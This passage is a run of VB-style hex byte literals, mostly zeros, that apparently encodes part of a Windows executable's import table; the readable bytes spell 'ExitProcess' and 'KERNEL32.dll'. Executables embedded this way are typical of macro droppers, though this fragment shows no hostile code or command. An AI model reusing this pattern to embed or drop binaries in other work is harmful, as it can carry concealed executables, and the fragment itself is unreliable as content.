&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2C&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H54&H30&H00&H00&H38&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H9C&H00&H45&H78&H69&H74&H50&H72&H6F&H63&H65&H73&H73&H00&H00&H00&H00&H30&H00&H00&H4B&H45&H52&H4E&H45&H4C&H33&H32&H2E&H64&H6C&H6C&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H21&H0A&H85&H1E&H30&HBD&HEA&HBE&H64&HE4&H8E
